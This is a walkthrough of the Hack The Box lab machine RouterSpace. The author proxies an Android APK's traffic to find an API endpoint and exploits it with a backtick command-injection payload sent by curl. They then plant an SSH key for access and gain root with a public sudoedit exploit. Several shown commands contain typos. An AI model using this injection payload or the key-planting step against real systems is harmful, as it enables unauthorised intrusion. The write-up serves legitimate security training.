RouterSpace — Hackthebox Walkthrough

This was a pretty cool box which included finding an endpoint from a APK file and then exploiting a node application to get command execution. For the root part, we have to exploit the sudoedit vulnerability which was a pretty hot topic these days.

User

namp reveals two 2 open ports.

nmap --open -sC -sV 10.10.11.148

PORT   STATE SERVICE    REASON  VERSION
22/tcp open tcpwrapped syn-ack
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
80/tcp open tcpwrapped syn-ack
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: RouterSpace
|_http-favicon: Unknown favicon MD5: 939407566E5C96D4EDF42DDDC4434FB3
|_http-trane-info: Problem with XML parsing of /evox/about

Looking at the port 80, we see a static page.

This included a hyperlink download a APK file.

http://10.10.11.148/RouterSpace.apk

I downloaded the file and did some static analysis. To be honest, this led me nowhere. So my only option was to install the APK on a device and see what it does.

I could have used Android Studio to start up an emulator to run this, but I used my old android device. It was just easier for me. So I used adb to connect to the device. If you are not familiar with what adb is, check out this article where I talk about the basics of adb

First, I installed the APK

adb install RouterSpace.apk

I listed the packages to confirm it was installed fine.

adb shell pm list packages|grep router

Then I did a dumpsys of the application which will simply give you information about the application.

adb shell dumpsys package com.routerspace

This gives us the activity name of the application which will help to start the application.

Then I invoked the application with the activity name I found.

adb shell am start -n com.routerspace/.MainActivity

NOTE: “All the steps after installing the APK could be done manually from the device itself, but I was more comfortable with adb

I was prompted saying Unable to connect to the server! when I click the Check Status button. Since I didn’t know what the error was about, I though of intercepting the traffic sent form the application and see what I could find.

For I configured a proxy with adb

adb shell settings put global http_proxy 192.168.1.6:8080

Then I started a listener on port 8080 with nc -lvnp 8080 and then clicked the Check Status button again. I got a POST request in my listener.

It was an POST request to a new endpoint.

/api/v4/monitoring/router/dev/check/deviceAccess

I also saw there are some POST data being sent. I tried some basic injections with this and I was able to do Command Injection with this payload.

{'ip': '`id`'}

curl -X POST -H 'Content-Tpe: application/json' http:/10.10.11.148/api/v4/monitoring/router/dev/check/deviceAccess -d '{"ip": "`id`"}' -H 'user-agent: RouterSpaceAgent' -H 'Host: routerspace.htb'

I set added my SSH private key to the authorized_keys file and then sshed in.

cat "ssh-rsa ...<SNIP>..." >> ~/.ssh/authorized_key

Root

Doing some basic enumeration, I found out that the version of sudo in use was 1.8.31 with:

sudo --verion

I knew this was vulnerable to sudoedit SUDO vulnerability which came in recently.

With a little googling I found a GitHub repo which I could use to exploit this.

I followed the steps mentioned in the repo. First, the exploit.c , shellcode.c and Makefile files to the box. Then I used the make command to compile the C file.

Then I simply executed the exploit binary and I got a shell as root.

./exploit

Rooted!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518

Happy Hacking !!! 😄

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kavishka Gihan

Kavishka Gihan

Cyber Security Student | Machine author in @hackthebox | find me on instagram @_kavi.gihan